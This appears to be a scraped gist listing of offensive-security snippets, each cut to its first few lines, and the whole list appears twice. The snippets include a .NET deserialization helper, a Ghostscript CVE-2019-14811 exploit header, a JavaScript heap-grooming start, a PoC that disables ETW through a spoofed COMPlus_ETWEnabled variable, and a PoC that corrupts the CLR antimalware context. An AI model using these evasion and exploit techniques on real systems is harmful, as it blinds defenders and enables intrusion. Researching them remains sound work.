qqvirus

## gist:5bd284d9a72e8281205466325663a63d
//All credit goes to Ysoserial.net and the great @tiraniddo
//Snippets copied from ysoserial.net
//https://thewover.github.io/Mixed-Assemblies/ - Great read!
//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
using System;
using System.Collections.Generic;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Reflection;

## Get-RdpLogonEvent.ps1
function Get-RdpLogonEvent
{
    [CmdletBinding()]
    param(
        [Int32] $Last = 10
    )

    $RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
        LogName='Security'
        ProviderName='Microsoft-Windows-Security-Auditing'

## RpcParser.java
//Locate RPC procecures inside of server code
//@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h)
//@category Functions
//@keybinding
//@menupath
//@toolbar

import ghidra.app.script.GhidraScript;
import ghidra.program.model.block.*;
import ghidra.program.model.symbol.*;

## fuck.js
function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
            new ArrayBuffer(0x1000000);
        }
}
let data_view = new DataView(new ArrayBuffer(8));

## __declspec关键字详细用法
__declspec关键字详细用法

       __declspec用于指定所给定类型的实例的与Microsoft相关的存储方式。其它的有关存储方式的修饰符如static与extern等是C和C++语言的ANSI规范，而__declspec是一种扩展属性的定义。扩展属性语法简化并标准化了C和C++语言关于Microsoft的扩展。
用法：__declspec ( extended-decl-modifier )
extended-decl-modifier参数如下，可同时出现，中间有空格隔开:
align （C++）
allocate
appdomain
deprecated （C++）
dllimport

## env_var_spoofing_poc.cpp
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

## exp[CVE-2019-14811].ps
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
/exploit {
  /println  { (\\n) exch print print } bind executeonly def
  /info     { ([*] ) print println } bind executeonly def
  /success  { ([+] ) print println } bind executeonly def
  /fail     { ([-] ) print println stop } bind executeonly def

  /MaxFileSize 16#10000 def
  /readfile {

## yey.py
from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
from PyQt5.QtCore import Qt, QTimer, QObject
from PyQt5.QtGui import QResizeEvent, QFocusEvent
from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp

import os
import sys
import idaapi
import idc

## CollectDotNetEvents.ps1
logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets

# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass

# logman stop dotNetTrace -ets

# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
# I got the process ID by running a procmon trace
$TargetProcessId = 8256

## CorruptCLRGlobal.ps1
function Subvert-CLRAntiMalware {
<#
.SYNOPSIS

A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

.DESCRIPTION

clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.
	//All credit goes to Ysoserial.net and the great @tiraniddo
	//Snippets copied from ysoserial.net
	//https://thewover.github.io/Mixed-Assemblies/ - Great read!
	//https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui - Another great read
	using System;
	using System.Collections.Generic;
	using System.Runtime.Serialization.Formatters.Binary;
	using System.IO;
	using System.Reflection;
	function Get-RdpLogonEvent
	{
	[CmdletBinding()]
	param(
	[Int32] $Last = 10
	)

	$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{
	LogName='Security'
	ProviderName='Microsoft-Windows-Security-Auditing'
	//Locate RPC procecures inside of server code
	//@author Matt Hand (@matterpreter) based on original work by Sektor7 Labs (@reenz0h)
	//@category Functions
	//@keybinding
	//@menupath
	//@toolbar

	import ghidra.app.script.GhidraScript;
	import ghidra.program.model.block.*;
	import ghidra.program.model.symbol.*;
	function sleep( sleepDuration ){
	var now = new Date().getTime();
	while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
	}
	function gc() {
	for (let i = 0; i < 0x10; i++) {
	new ArrayBuffer(0x1000000);
	}
	}
	let data_view = new DataView(new ArrayBuffer(8));
	__declspec关键字详细用法

	__declspec用于指定所给定类型的实例的与Microsoft相关的存储方式。其它的有关存储方式的修饰符如static与extern等是C和C++语言的ANSI规范，而__declspec是一种扩展属性的定义。扩展属性语法简化并标准化了C和C++语言关于Microsoft的扩展。
	用法：__declspec ( extended-decl-modifier )
	extended-decl-modifier参数如下，可同时出现，中间有空格隔开:
	align （C++）
	allocate
	appdomain
	deprecated （C++）
	dllimport
	// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
	// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
	//
	// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
	// and then resuming the process.
	//
	// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

	#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
	#define INJECT_PARAM_LEN 43
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	% just copy from https://gist.github.com/hhc0null/82bf2e57ac93c1a48115a1b4afcde706
	/exploit {
	/println { (\\n) exch print print } bind executeonly def
	/info { ([*] ) print println } bind executeonly def
	/success { ([+] ) print println } bind executeonly def
	/fail { ([-] ) print println stop } bind executeonly def

	/MaxFileSize 16#10000 def
	/readfile {
	from ctypes import c_ssize_t, c_void_p, c_int, c_void_p, create_string_buffer, cast, WINFUNCTYPE, CFUNCTYPE, windll, cdll, CDLL
	from PyQt5.QtCore import Qt, QTimer, QObject
	from PyQt5.QtGui import QResizeEvent, QFocusEvent
	from PyQt5.QtWidgets import QWidget, QDialog, QDialogButtonBox, QPushButton, qApp

	import os
	import sys
	import idaapi
	import idc
	logman --% start dotNetTrace -p Microsoft-Windows-DotNETRuntime (JitKeyword,NGenKeyword,InteropKeyword,LoaderKeyword) win:Informational -o dotNetTrace.etl -ets

	# Do your evil .NET thing now. In this example, I executed the Microsoft.Workflow.Compiler.exe bypass

	# logman stop dotNetTrace -ets

	# This is the process ID of the process I want to capture. In this case, Microsoft.Workflow.Compiler.exe
	# I got the process ID by running a procmon trace
	$TargetProcessId = 8256
	function Subvert-CLRAntiMalware {
	<#
	.SYNOPSIS

	A proof-of-concept demonstrating overwriting a global variable that stores a pointer to an antimalware scan interface context structure. This PoC was only built to work with .NET Framework Early Access build 3694.

	.DESCRIPTION

	clr.dll in .NET Framework Early Access build 3694 has a global variable that stores a pointer to an antimalware scan interface context structure. By reading the pointer at that offset and then overwriting the forst DWORD, the context structure will become corrupted and subsequent scanning calls will fail open.